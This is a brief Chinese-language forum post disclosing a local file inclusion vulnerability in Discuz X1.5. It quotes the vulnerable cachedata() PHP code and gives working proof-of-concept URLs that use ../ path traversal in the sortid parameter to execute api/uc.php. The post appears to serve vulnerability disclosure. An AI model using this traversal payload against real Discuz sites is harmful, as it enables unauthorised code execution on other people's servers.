DISCUZ X1.5 本地文件包含漏洞说明
config_global.php <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode1"> <br /> $_config['cache']['type'] = ‘file’; <br /> function cachedata($cachenames) { <br /> …… <br /> $isfilecache = getglobal(‘config/cache/type’) == ‘file’; <br /> …… <br /> if($isfilecache) { <br /> $lostcaches = array(); <br /> foreach($cachenames as $cachename) { <br /> if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) { <br /> $lostcaches[] = $cachename; <br /> } <br /> } <br /> …… <br /> } <br /></div><br /> 地址: <br /> http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc <br /> http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried <br /> 执行了 api/uc.php 页面代码了。 <br /> 作者: Jannock
頁:
[1]